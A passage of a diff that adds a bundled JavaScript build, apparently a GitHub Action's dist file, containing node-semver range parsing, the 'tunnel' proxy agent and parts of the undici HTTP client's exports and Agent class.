{ + return comps.join(' ').trim() + }).join('||').trim() + return this.range +} + +Range.prototype.toString = function () { + return this.range +} + +Range.prototype.parseRange = function (range) { + var loose = this.options.loose + // `1.2.3 - 1.2.4` => `>=1.2.3 <=1.2.4` + var hr = loose ? 
safeRe[t.HYPHENRANGELOOSE] : safeRe[t.HYPHENRANGE] + range = range.replace(hr, hyphenReplace) + debug('hyphen replace', range) + // `> 1.2.3 < 1.2.5` => `>1.2.3 <1.2.5` + range = range.replace(safeRe[t.COMPARATORTRIM], comparatorTrimReplace) + debug('comparator trim', range, safeRe[t.COMPARATORTRIM]) + + // `~ 1.2.3` => `~1.2.3` + range = range.replace(safeRe[t.TILDETRIM], tildeTrimReplace) + + // `^ 1.2.3` => `^1.2.3` + range = range.replace(safeRe[t.CARETTRIM], caretTrimReplace) + + // normalize spaces + range = range.split(/\s+/).join(' ') + + // At this point, the range is completely trimmed and + // ready to be split into comparators. + + var compRe = loose ? safeRe[t.COMPARATORLOOSE] : safeRe[t.COMPARATOR] + var set = range.split(' ').map(function (comp) { + return parseComparator(comp, this.options) + }, this).join(' ').split(/\s+/) + if (this.options.loose) { + // in loose mode, throw out any that are not valid comparators + set = set.filter(function (comp) { + return !!comp.match(compRe) + }) + } + set = set.map(function (comp) { + return new Comparator(comp, this.options) + }, this) + + return set +} + +Range.prototype.intersects = function (range, options) { + if (!(range instanceof Range)) { + throw new TypeError('a Range is required') + } + + return this.set.some(function (thisComparators) { + return ( + isSatisfiable(thisComparators, options) && + range.set.some(function (rangeComparators) { + return ( + isSatisfiable(rangeComparators, options) && + thisComparators.every(function (thisComparator) { + return rangeComparators.every(function (rangeComparator) { + return thisComparator.intersects(rangeComparator, options) + }) + }) + ) + }) + ) + }) +} + +// take a set of comparators and determine whether there +// exists a version which can satisfy it +function isSatisfiable (comparators, options) { + var result = true + var remainingComparators = comparators.slice() + var testComparator = remainingComparators.pop() + + while (result && 
remainingComparators.length) { + result = remainingComparators.every(function (otherComparator) { + return testComparator.intersects(otherComparator, options) + }) + + testComparator = remainingComparators.pop() + } + + return result +} + +// Mostly just for testing and legacy API reasons +exports.toComparators = toComparators +function toComparators (range, options) { + return new Range(range, options).set.map(function (comp) { + return comp.map(function (c) { + return c.value + }).join(' ').trim().split(' ') + }) +} + +// comprised of xranges, tildes, stars, and gtlt's at this point. +// already replaced the hyphen ranges +// turn into a set of JUST comparators. +function parseComparator (comp, options) { + debug('comp', comp, options) + comp = replaceCarets(comp, options) + debug('caret', comp) + comp = replaceTildes(comp, options) + debug('tildes', comp) + comp = replaceXRanges(comp, options) + debug('xrange', comp) + comp = replaceStars(comp, options) + debug('stars', comp) + return comp +} + +function isX (id) { + return !id || id.toLowerCase() === 'x' || id === '*' +} + +// ~, ~> --> * (any, kinda silly) +// ~2, ~2.x, ~2.x.x, ~>2, ~>2.x ~>2.x.x --> >=2.0.0 <3.0.0 +// ~2.0, ~2.0.x, ~>2.0, ~>2.0.x --> >=2.0.0 <2.1.0 +// ~1.2, ~1.2.x, ~>1.2, ~>1.2.x --> >=1.2.0 <1.3.0 +// ~1.2.3, ~>1.2.3 --> >=1.2.3 <1.3.0 +// ~1.2.0, ~>1.2.0 --> >=1.2.0 <1.3.0 +function replaceTildes (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceTilde(comp, options) + }).join(' ') +} + +function replaceTilde (comp, options) { + var r = options.loose ? safeRe[t.TILDELOOSE] : safeRe[t.TILDE] + return comp.replace(r, function (_, M, m, p, pr) { + debug('tilde', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + // ~1.2 == >=1.2.0 <1.3.0 + ret = '>=' + M + '.' + m + '.0 <' + M + '.' 
+ (+m + 1) + '.0' + } else if (pr) { + debug('replaceTilde pr', pr) + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } else { + // ~1.2.3 == >=1.2.3 <1.3.0 + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + + debug('tilde return', ret) + return ret + }) +} + +// ^ --> * (any, kinda silly) +// ^2, ^2.x, ^2.x.x --> >=2.0.0 <3.0.0 +// ^2.0, ^2.0.x --> >=2.0.0 <3.0.0 +// ^1.2, ^1.2.x --> >=1.2.0 <2.0.0 +// ^1.2.3 --> >=1.2.3 <2.0.0 +// ^1.2.0 --> >=1.2.0 <2.0.0 +function replaceCarets (comp, options) { + return comp.trim().split(/\s+/).map(function (comp) { + return replaceCaret(comp, options) + }).join(' ') +} + +function replaceCaret (comp, options) { + debug('caret', comp, options) + var r = options.loose ? safeRe[t.CARETLOOSE] : safeRe[t.CARET] + return comp.replace(r, function (_, M, m, p, pr) { + debug('caret', comp, _, M, m, p, pr) + var ret + + if (isX(M)) { + ret = '' + } else if (isX(m)) { + ret = '>=' + M + '.0.0 <' + (+M + 1) + '.0.0' + } else if (isX(p)) { + if (M === '0') { + ret = '>=' + M + '.' + m + '.0 <' + M + '.' + (+m + 1) + '.0' + } else { + ret = '>=' + M + '.' + m + '.0 <' + (+M + 1) + '.0.0' + } + } else if (pr) { + debug('replaceCaret pr', pr) + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' + p + '-' + pr + + ' <' + (+M + 1) + '.0.0' + } + } else { + debug('no pr') + if (M === '0') { + if (m === '0') { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + m + '.' + (+p + 1) + } else { + ret = '>=' + M + '.' + m + '.' + p + + ' <' + M + '.' + (+m + 1) + '.0' + } + } else { + ret = '>=' + M + '.' + m + '.' 
+ p + + ' <' + (+M + 1) + '.0.0' + } + } + + debug('caret return', ret) + return ret + }) +} + +function replaceXRanges (comp, options) { + debug('replaceXRanges', comp, options) + return comp.split(/\s+/).map(function (comp) { + return replaceXRange(comp, options) + }).join(' ') +} + +function replaceXRange (comp, options) { + comp = comp.trim() + var r = options.loose ? safeRe[t.XRANGELOOSE] : safeRe[t.XRANGE] + return comp.replace(r, function (ret, gtlt, M, m, p, pr) { + debug('xRange', comp, ret, gtlt, M, m, p, pr) + var xM = isX(M) + var xm = xM || isX(m) + var xp = xm || isX(p) + var anyX = xp + + if (gtlt === '=' && anyX) { + gtlt = '' + } + + // if we're including prereleases in the match, then we need + // to fix this to -0, the lowest possible prerelease value + pr = options.includePrerelease ? '-0' : '' + + if (xM) { + if (gtlt === '>' || gtlt === '<') { + // nothing is allowed + ret = '<0.0.0-0' + } else { + // nothing is forbidden + ret = '*' + } + } else if (gtlt && anyX) { + // we know patch is an x, because we have any x at all. + // replace X with 0 + if (xm) { + m = 0 + } + p = 0 + + if (gtlt === '>') { + // >1 => >=2.0.0 + // >1.2 => >=1.3.0 + // >1.2.3 => >= 1.2.4 + gtlt = '>=' + if (xm) { + M = +M + 1 + m = 0 + p = 0 + } else { + m = +m + 1 + p = 0 + } + } else if (gtlt === '<=') { + // <=0.7.x is actually <0.8.0, since any 0.7.x should + // pass. Similarly, <=7.x is actually <8.0.0, etc. + gtlt = '<' + if (xm) { + M = +M + 1 + } else { + m = +m + 1 + } + } + + ret = gtlt + M + '.' + m + '.' + p + pr + } else if (xm) { + ret = '>=' + M + '.0.0' + pr + ' <' + (+M + 1) + '.0.0' + pr + } else if (xp) { + ret = '>=' + M + '.' + m + '.0' + pr + + ' <' + M + '.' + (+m + 1) + '.0' + pr + } + + debug('xRange return', ret) + + return ret + }) +} + +// Because * is AND-ed with everything else in the comparator, +// and '' means "any version", just remove the *s entirely. 
+function replaceStars (comp, options) { + debug('replaceStars', comp, options) + // Looseness is ignored here. star is always as loose as it gets! + return comp.trim().replace(safeRe[t.STAR], '') +} + +// This function is passed to string.replace(re[t.HYPHENRANGE]) +// M, m, patch, prerelease, build +// 1.2 - 3.4.5 => >=1.2.0 <=3.4.5 +// 1.2.3 - 3.4 => >=1.2.0 <3.5.0 Any 3.4.x will do +// 1.2 - 3.4 => >=1.2.0 <3.5.0 +function hyphenReplace ($0, + from, fM, fm, fp, fpr, fb, + to, tM, tm, tp, tpr, tb) { + if (isX(fM)) { + from = '' + } else if (isX(fm)) { + from = '>=' + fM + '.0.0' + } else if (isX(fp)) { + from = '>=' + fM + '.' + fm + '.0' + } else { + from = '>=' + from + } + + if (isX(tM)) { + to = '' + } else if (isX(tm)) { + to = '<' + (+tM + 1) + '.0.0' + } else if (isX(tp)) { + to = '<' + tM + '.' + (+tm + 1) + '.0' + } else if (tpr) { + to = '<=' + tM + '.' + tm + '.' + tp + '-' + tpr + } else { + to = '<=' + to + } + + return (from + ' ' + to).trim() +} + +// if ANY of the sets match ALL of its comparators, then pass +Range.prototype.test = function (version) { + if (!version) { + return false + } + + if (typeof version === 'string') { + try { + version = new SemVer(version, this.options) + } catch (er) { + return false + } + } + + for (var i = 0; i < this.set.length; i++) { + if (testSet(this.set[i], version, this.options)) { + return true + } + } + return false +} + +function testSet (set, version, options) { + for (var i = 0; i < set.length; i++) { + if (!set[i].test(version)) { + return false + } + } + + if (version.prerelease.length && !options.includePrerelease) { + // Find the set of versions that are allowed to have prereleases + // For example, ^1.2.3-pr.1 desugars to >=1.2.3-pr.1 <2.0.0 + // That should allow `1.2.3-pr.2` to pass. + // However, `1.2.4-alpha.notready` should NOT be allowed, + // even though it's within the range set by the comparators. 
+ for (i = 0; i < set.length; i++) { + debug(set[i].semver) + if (set[i].semver === ANY) { + continue + } + + if (set[i].semver.prerelease.length > 0) { + var allowed = set[i].semver + if (allowed.major === version.major && + allowed.minor === version.minor && + allowed.patch === version.patch) { + return true + } + } + } + + // Version has a -pre, but it's not one of the ones we like. + return false + } + + return true +} + +exports.satisfies = satisfies +function satisfies (version, range, options) { + try { + range = new Range(range, options) + } catch (er) { + return false + } + return range.test(version) +} + +exports.maxSatisfying = maxSatisfying +function maxSatisfying (versions, range, options) { + var max = null + var maxSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!max || maxSV.compare(v) === -1) { + // compare(max, v, true) + max = v + maxSV = new SemVer(max, options) + } + } + }) + return max +} + +exports.minSatisfying = minSatisfying +function minSatisfying (versions, range, options) { + var min = null + var minSV = null + try { + var rangeObj = new Range(range, options) + } catch (er) { + return null + } + versions.forEach(function (v) { + if (rangeObj.test(v)) { + // satisfies(v, range, options) + if (!min || minSV.compare(v) === 1) { + // compare(min, v, true) + min = v + minSV = new SemVer(min, options) + } + } + }) + return min +} + +exports.minVersion = minVersion +function minVersion (range, loose) { + range = new Range(range, loose) + + var minver = new SemVer('0.0.0') + if (range.test(minver)) { + return minver + } + + minver = new SemVer('0.0.0-0') + if (range.test(minver)) { + return minver + } + + minver = null + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + comparators.forEach(function (comparator) { + // Clone to avoid manipulating the comparator's 
semver object. + var compver = new SemVer(comparator.semver.version) + switch (comparator.operator) { + case '>': + if (compver.prerelease.length === 0) { + compver.patch++ + } else { + compver.prerelease.push(0) + } + compver.raw = compver.format() + /* fallthrough */ + case '': + case '>=': + if (!minver || gt(minver, compver)) { + minver = compver + } + break + case '<': + case '<=': + /* Ignore maximum versions */ + break + /* istanbul ignore next */ + default: + throw new Error('Unexpected operation: ' + comparator.operator) + } + }) + } + + if (minver && range.test(minver)) { + return minver + } + + return null +} + +exports.validRange = validRange +function validRange (range, options) { + try { + // Return '*' instead of '' so that truthiness works. + // This will throw if it's invalid anyway + return new Range(range, options).range || '*' + } catch (er) { + return null + } +} + +// Determine if version is less than all the versions possible in the range +exports.ltr = ltr +function ltr (version, range, options) { + return outside(version, range, '<', options) +} + +// Determine if version is greater than all the versions possible in the range. +exports.gtr = gtr +function gtr (version, range, options) { + return outside(version, range, '>', options) +} + +exports.outside = outside +function outside (version, range, hilo, options) { + version = new SemVer(version, options) + range = new Range(range, options) + + var gtfn, ltefn, ltfn, comp, ecomp + switch (hilo) { + case '>': + gtfn = gt + ltefn = lte + ltfn = lt + comp = '>' + ecomp = '>=' + break + case '<': + gtfn = lt + ltefn = gte + ltfn = gt + comp = '<' + ecomp = '<=' + break + default: + throw new TypeError('Must provide a hilo val of "<" or ">"') + } + + // If it satisifes the range it is not outside + if (satisfies(version, range, options)) { + return false + } + + // From now on, variable terms are as if we're in "gtr" mode. + // but note that everything is flipped for the "ltr" function. 
+ + for (var i = 0; i < range.set.length; ++i) { + var comparators = range.set[i] + + var high = null + var low = null + + comparators.forEach(function (comparator) { + if (comparator.semver === ANY) { + comparator = new Comparator('>=0.0.0') + } + high = high || comparator + low = low || comparator + if (gtfn(comparator.semver, high.semver, options)) { + high = comparator + } else if (ltfn(comparator.semver, low.semver, options)) { + low = comparator + } + }) + + // If the edge version comparator has a operator then our version + // isn't outside it + if (high.operator === comp || high.operator === ecomp) { + return false + } + + // If the lowest version comparator has an operator and our version + // is less than it then it isn't higher than the range + if ((!low.operator || low.operator === comp) && + ltefn(version, low.semver)) { + return false + } else if (low.operator === ecomp && ltfn(version, low.semver)) { + return false + } + } + return true +} + +exports.prerelease = prerelease +function prerelease (version, options) { + var parsed = parse(version, options) + return (parsed && parsed.prerelease.length) ? parsed.prerelease : null +} + +exports.intersects = intersects +function intersects (r1, r2, options) { + r1 = new Range(r1, options) + r2 = new Range(r2, options) + return r1.intersects(r2) +} + +exports.coerce = coerce +function coerce (version, options) { + if (version instanceof SemVer) { + return version + } + + if (typeof version === 'number') { + version = String(version) + } + + if (typeof version !== 'string') { + return null + } + + options = options || {} + + var match = null + if (!options.rtl) { + match = version.match(safeRe[t.COERCE]) + } else { + // Find the right-most coercible string that does not share + // a terminus with a more left-ward coercible string. 
+ // Eg, '1.2.3.4' wants to coerce '2.3.4', not '3.4' or '4' + // + // Walk through the string checking with a /g regexp + // Manually set the index so as to pick up overlapping matches. + // Stop when we get a match that ends at the string end, since no + // coercible string can be more right-ward without the same terminus. + var next + while ((next = safeRe[t.COERCERTL].exec(version)) && + (!match || match.index + match[0].length !== version.length) + ) { + if (!match || + next.index + next[0].length !== match.index + match[0].length) { + match = next + } + safeRe[t.COERCERTL].lastIndex = next.index + next[1].length + next[2].length + } + // leave it in a clean state + safeRe[t.COERCERTL].lastIndex = -1 + } + + if (match === null) { + return null + } + + return parse(match[2] + + '.' + (match[3] || '0') + + '.' + (match[4] || '0'), options) +} + + +/***/ }), + +/***/ 4294: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +module.exports = __nccwpck_require__(4219); + + +/***/ }), + +/***/ 4219: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +var net = __nccwpck_require__(1808); +var tls = __nccwpck_require__(4404); +var http = __nccwpck_require__(3685); +var https = __nccwpck_require__(5687); +var events = __nccwpck_require__(2361); +var assert = __nccwpck_require__(9491); +var util = __nccwpck_require__(3837); + + +exports.httpOverHttp = httpOverHttp; +exports.httpsOverHttp = httpsOverHttp; +exports.httpOverHttps = httpOverHttps; +exports.httpsOverHttps = httpsOverHttps; + + +function httpOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + return agent; +} + +function httpsOverHttp(options) { + var agent = new TunnelingAgent(options); + agent.request = http.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + +function httpOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = 
https.request; + return agent; +} + +function httpsOverHttps(options) { + var agent = new TunnelingAgent(options); + agent.request = https.request; + agent.createSocket = createSecureSocket; + agent.defaultPort = 443; + return agent; +} + + +function TunnelingAgent(options) { + var self = this; + self.options = options || {}; + self.proxyOptions = self.options.proxy || {}; + self.maxSockets = self.options.maxSockets || http.Agent.defaultMaxSockets; + self.requests = []; + self.sockets = []; + + self.on('free', function onFree(socket, host, port, localAddress) { + var options = toOptions(host, port, localAddress); + for (var i = 0, len = self.requests.length; i < len; ++i) { + var pending = self.requests[i]; + if (pending.host === options.host && pending.port === options.port) { + // Detect the request to connect same origin server, + // reuse the connection. + self.requests.splice(i, 1); + pending.request.onSocket(socket); + return; + } + } + socket.destroy(); + self.removeSocket(socket); + }); +} +util.inherits(TunnelingAgent, events.EventEmitter); + +TunnelingAgent.prototype.addRequest = function addRequest(req, host, port, localAddress) { + var self = this; + var options = mergeOptions({request: req}, self.options, toOptions(host, port, localAddress)); + + if (self.sockets.length >= this.maxSockets) { + // We are over limit so we'll add it to the queue. + self.requests.push(options); + return; + } + + // If we are under maxSockets create a new one. 
+ self.createSocket(options, function(socket) { + socket.on('free', onFree); + socket.on('close', onCloseOrRemove); + socket.on('agentRemove', onCloseOrRemove); + req.onSocket(socket); + + function onFree() { + self.emit('free', socket, options); + } + + function onCloseOrRemove(err) { + self.removeSocket(socket); + socket.removeListener('free', onFree); + socket.removeListener('close', onCloseOrRemove); + socket.removeListener('agentRemove', onCloseOrRemove); + } + }); +}; + +TunnelingAgent.prototype.createSocket = function createSocket(options, cb) { + var self = this; + var placeholder = {}; + self.sockets.push(placeholder); + + var connectOptions = mergeOptions({}, self.proxyOptions, { + method: 'CONNECT', + path: options.host + ':' + options.port, + agent: false, + headers: { + host: options.host + ':' + options.port + } + }); + if (options.localAddress) { + connectOptions.localAddress = options.localAddress; + } + if (connectOptions.proxyAuth) { + connectOptions.headers = connectOptions.headers || {}; + connectOptions.headers['Proxy-Authorization'] = 'Basic ' + + new Buffer(connectOptions.proxyAuth).toString('base64'); + } + + debug('making CONNECT request'); + var connectReq = self.request(connectOptions); + connectReq.useChunkedEncodingByDefault = false; // for v0.6 + connectReq.once('response', onResponse); // for v0.6 + connectReq.once('upgrade', onUpgrade); // for v0.6 + connectReq.once('connect', onConnect); // for v0.7 or later + connectReq.once('error', onError); + connectReq.end(); + + function onResponse(res) { + // Very hacky. This is necessary to avoid http-parser leaks. + res.upgrade = true; + } + + function onUpgrade(res, socket, head) { + // Hacky. 
+ process.nextTick(function() { + onConnect(res, socket, head); + }); + } + + function onConnect(res, socket, head) { + connectReq.removeAllListeners(); + socket.removeAllListeners(); + + if (res.statusCode !== 200) { + debug('tunneling socket could not be established, statusCode=%d', + res.statusCode); + socket.destroy(); + var error = new Error('tunneling socket could not be established, ' + + 'statusCode=' + res.statusCode); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + if (head.length > 0) { + debug('got illegal response body from proxy'); + socket.destroy(); + var error = new Error('got illegal response body from proxy'); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + return; + } + debug('tunneling connection has established'); + self.sockets[self.sockets.indexOf(placeholder)] = socket; + return cb(socket); + } + + function onError(cause) { + connectReq.removeAllListeners(); + + debug('tunneling socket could not be established, cause=%s\n', + cause.message, cause.stack); + var error = new Error('tunneling socket could not be established, ' + + 'cause=' + cause.message); + error.code = 'ECONNRESET'; + options.request.emit('error', error); + self.removeSocket(placeholder); + } +}; + +TunnelingAgent.prototype.removeSocket = function removeSocket(socket) { + var pos = this.sockets.indexOf(socket) + if (pos === -1) { + return; + } + this.sockets.splice(pos, 1); + + var pending = this.requests.shift(); + if (pending) { + // If we have pending requests and a socket gets closed a new one + // needs to be created to take over in the pool for the one that closed. 
+ this.createSocket(pending, function(socket) { + pending.request.onSocket(socket); + }); + } +}; + +function createSecureSocket(options, cb) { + var self = this; + TunnelingAgent.prototype.createSocket.call(self, options, function(socket) { + var hostHeader = options.request.getHeader('host'); + var tlsOptions = mergeOptions({}, self.options, { + socket: socket, + servername: hostHeader ? hostHeader.replace(/:.*$/, '') : options.host + }); + + // 0 is dummy port for v0.6 + var secureSocket = tls.connect(0, tlsOptions); + self.sockets[self.sockets.indexOf(socket)] = secureSocket; + cb(secureSocket); + }); +} + + +function toOptions(host, port, localAddress) { + if (typeof host === 'string') { // since v0.10 + return { + host: host, + port: port, + localAddress: localAddress + }; + } + return host; // for v0.11 or later +} + +function mergeOptions(target) { + for (var i = 1, len = arguments.length; i < len; ++i) { + var overrides = arguments[i]; + if (typeof overrides === 'object') { + var keys = Object.keys(overrides); + for (var j = 0, keyLen = keys.length; j < keyLen; ++j) { + var k = keys[j]; + if (overrides[k] !== undefined) { + target[k] = overrides[k]; + } + } + } + } + return target; +} + + +var debug; +if (process.env.NODE_DEBUG && /\btunnel\b/.test(process.env.NODE_DEBUG)) { + debug = function() { + var args = Array.prototype.slice.call(arguments); + if (typeof args[0] === 'string') { + args[0] = 'TUNNEL: ' + args[0]; + } else { + args.unshift('TUNNEL:'); + } + console.error.apply(console, args); + } +} else { + debug = function() {}; +} +exports.debug = debug; // for test + + +/***/ }), + +/***/ 1773: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Client = __nccwpck_require__(3598) +const Dispatcher = __nccwpck_require__(412) +const errors = __nccwpck_require__(8045) +const Pool = __nccwpck_require__(4634) +const BalancedPool = __nccwpck_require__(7931) +const Agent = __nccwpck_require__(7890) +const util 
= __nccwpck_require__(3983) +const { InvalidArgumentError } = errors +const api = __nccwpck_require__(4059) +const buildConnector = __nccwpck_require__(2067) +const MockClient = __nccwpck_require__(8687) +const MockAgent = __nccwpck_require__(6771) +const MockPool = __nccwpck_require__(6193) +const mockErrors = __nccwpck_require__(888) +const ProxyAgent = __nccwpck_require__(7858) +const RetryHandler = __nccwpck_require__(2286) +const { getGlobalDispatcher, setGlobalDispatcher } = __nccwpck_require__(1892) +const DecoratorHandler = __nccwpck_require__(6930) +const RedirectHandler = __nccwpck_require__(2860) +const createRedirectInterceptor = __nccwpck_require__(8861) + +let hasCrypto +try { + __nccwpck_require__(6113) + hasCrypto = true +} catch { + hasCrypto = false +} + +Object.assign(Dispatcher.prototype, api) + +module.exports.Dispatcher = Dispatcher +module.exports.Client = Client +module.exports.Pool = Pool +module.exports.BalancedPool = BalancedPool +module.exports.Agent = Agent +module.exports.ProxyAgent = ProxyAgent +module.exports.RetryHandler = RetryHandler + +module.exports.DecoratorHandler = DecoratorHandler +module.exports.RedirectHandler = RedirectHandler +module.exports.createRedirectInterceptor = createRedirectInterceptor + +module.exports.buildConnector = buildConnector +module.exports.errors = errors + +function makeDispatcher (fn) { + return (url, opts, handler) => { + if (typeof opts === 'function') { + handler = opts + opts = null + } + + if (!url || (typeof url !== 'string' && typeof url !== 'object' && !(url instanceof URL))) { + throw new InvalidArgumentError('invalid url') + } + + if (opts != null && typeof opts !== 'object') { + throw new InvalidArgumentError('invalid opts') + } + + if (opts && opts.path != null) { + if (typeof opts.path !== 'string') { + throw new InvalidArgumentError('invalid opts.path') + } + + let path = opts.path + if (!opts.path.startsWith('/')) { + path = `/${path}` + } + + url = new 
URL(util.parseOrigin(url).origin + path) + } else { + if (!opts) { + opts = typeof url === 'object' ? url : {} + } + + url = util.parseURL(url) + } + + const { agent, dispatcher = getGlobalDispatcher() } = opts + + if (agent) { + throw new InvalidArgumentError('unsupported opts.agent. Did you mean opts.client?') + } + + return fn.call(dispatcher, { + ...opts, + origin: url.origin, + path: url.search ? `${url.pathname}${url.search}` : url.pathname, + method: opts.method || (opts.body ? 'PUT' : 'GET') + }, handler) + } +} + +module.exports.setGlobalDispatcher = setGlobalDispatcher +module.exports.getGlobalDispatcher = getGlobalDispatcher + +if (util.nodeMajor > 16 || (util.nodeMajor === 16 && util.nodeMinor >= 8)) { + let fetchImpl = null + module.exports.fetch = async function fetch (resource) { + if (!fetchImpl) { + fetchImpl = (__nccwpck_require__(4881).fetch) + } + + try { + return await fetchImpl(...arguments) + } catch (err) { + if (typeof err === 'object') { + Error.captureStackTrace(err, this) + } + + throw err + } + } + module.exports.Headers = __nccwpck_require__(554).Headers + module.exports.Response = __nccwpck_require__(7823).Response + module.exports.Request = __nccwpck_require__(8359).Request + module.exports.FormData = __nccwpck_require__(2015).FormData + module.exports.File = __nccwpck_require__(8511).File + module.exports.FileReader = __nccwpck_require__(1446).FileReader + + const { setGlobalOrigin, getGlobalOrigin } = __nccwpck_require__(1246) + + module.exports.setGlobalOrigin = setGlobalOrigin + module.exports.getGlobalOrigin = getGlobalOrigin + + const { CacheStorage } = __nccwpck_require__(7907) + const { kConstruct } = __nccwpck_require__(9174) + + // Cache & CacheStorage are tightly coupled with fetch. Even if it may run + // in an older version of Node, it doesn't have any use without fetch. 
+ module.exports.caches = new CacheStorage(kConstruct) +} + +if (util.nodeMajor >= 16) { + const { deleteCookie, getCookies, getSetCookies, setCookie } = __nccwpck_require__(1724) + + module.exports.deleteCookie = deleteCookie + module.exports.getCookies = getCookies + module.exports.getSetCookies = getSetCookies + module.exports.setCookie = setCookie + + const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) + + module.exports.parseMIMEType = parseMIMEType + module.exports.serializeAMimeType = serializeAMimeType +} + +if (util.nodeMajor >= 18 && hasCrypto) { + const { WebSocket } = __nccwpck_require__(4284) + + module.exports.WebSocket = WebSocket +} + +module.exports.request = makeDispatcher(api.request) +module.exports.stream = makeDispatcher(api.stream) +module.exports.pipeline = makeDispatcher(api.pipeline) +module.exports.connect = makeDispatcher(api.connect) +module.exports.upgrade = makeDispatcher(api.upgrade) + +module.exports.MockClient = MockClient +module.exports.MockPool = MockPool +module.exports.MockAgent = MockAgent +module.exports.mockErrors = mockErrors + + +/***/ }), + +/***/ 7890: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { kClients, kRunning, kClose, kDestroy, kDispatch, kInterceptors } = __nccwpck_require__(2785) +const DispatcherBase = __nccwpck_require__(4839) +const Pool = __nccwpck_require__(4634) +const Client = __nccwpck_require__(3598) +const util = __nccwpck_require__(3983) +const createRedirectInterceptor = __nccwpck_require__(8861) +const { WeakRef, FinalizationRegistry } = __nccwpck_require__(6436)() + +const kOnConnect = Symbol('onConnect') +const kOnDisconnect = Symbol('onDisconnect') +const kOnConnectionError = Symbol('onConnectionError') +const kMaxRedirections = Symbol('maxRedirections') +const kOnDrain = Symbol('onDrain') +const kFactory = Symbol('factory') +const kFinalizer = Symbol('finalizer') 
+const kOptions = Symbol('options') + +function defaultFactory (origin, opts) { + return opts && opts.connections === 1 + ? new Client(origin, opts) + : new Pool(origin, opts) +} + +class Agent extends DispatcherBase { + constructor ({ factory = defaultFactory, maxRedirections = 0, connect, ...options } = {}) { + super() + + if (typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (!Number.isInteger(maxRedirections) || maxRedirections < 0) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (connect && typeof connect !== 'function') { + connect = { ...connect } + } + + this[kInterceptors] = options.interceptors && options.interceptors.Agent && Array.isArray(options.interceptors.Agent) + ? options.interceptors.Agent + : [createRedirectInterceptor({ maxRedirections })] + + this[kOptions] = { ...util.deepClone(options), connect } + this[kOptions].interceptors = options.interceptors + ? 
{ ...options.interceptors } + : undefined + this[kMaxRedirections] = maxRedirections + this[kFactory] = factory + this[kClients] = new Map() + this[kFinalizer] = new FinalizationRegistry(/* istanbul ignore next: gc is undeterministic */ key => { + const ref = this[kClients].get(key) + if (ref !== undefined && ref.deref() === undefined) { + this[kClients].delete(key) + } + }) + + const agent = this + + this[kOnDrain] = (origin, targets) => { + agent.emit('drain', origin, [agent, ...targets]) + } + + this[kOnConnect] = (origin, targets) => { + agent.emit('connect', origin, [agent, ...targets]) + } + + this[kOnDisconnect] = (origin, targets, err) => { + agent.emit('disconnect', origin, [agent, ...targets], err) + } + + this[kOnConnectionError] = (origin, targets, err) => { + agent.emit('connectionError', origin, [agent, ...targets], err) + } + } + + get [kRunning] () { + let ret = 0 + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore next: gc is undeterministic */ + if (client) { + ret += client[kRunning] + } + } + return ret + } + + [kDispatch] (opts, handler) { + let key + if (opts.origin && (typeof opts.origin === 'string' || opts.origin instanceof URL)) { + key = String(opts.origin) + } else { + throw new InvalidArgumentError('opts.origin must be a non-empty string or URL.') + } + + const ref = this[kClients].get(key) + + let dispatcher = ref ? 
ref.deref() : null + if (!dispatcher) { + dispatcher = this[kFactory](opts.origin, this[kOptions]) + .on('drain', this[kOnDrain]) + .on('connect', this[kOnConnect]) + .on('disconnect', this[kOnDisconnect]) + .on('connectionError', this[kOnConnectionError]) + + this[kClients].set(key, new WeakRef(dispatcher)) + this[kFinalizer].register(dispatcher, key) + } + + return dispatcher.dispatch(opts, handler) + } + + async [kClose] () { + const closePromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + closePromises.push(client.close()) + } + } + + await Promise.all(closePromises) + } + + async [kDestroy] (err) { + const destroyPromises = [] + for (const ref of this[kClients].values()) { + const client = ref.deref() + /* istanbul ignore else: gc is undeterministic */ + if (client) { + destroyPromises.push(client.destroy(err)) + } + } + + await Promise.all(destroyPromises) + } +} + +module.exports = Agent + + +/***/ }), + +/***/ 7032: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const { addAbortListener } = __nccwpck_require__(3983) +const { RequestAbortedError } = __nccwpck_require__(8045) + +const kListener = Symbol('kListener') +const kSignal = Symbol('kSignal') + +function abort (self) { + if (self.abort) { + self.abort() + } else { + self.onError(new RequestAbortedError()) + } +} + +function addSignal (self, 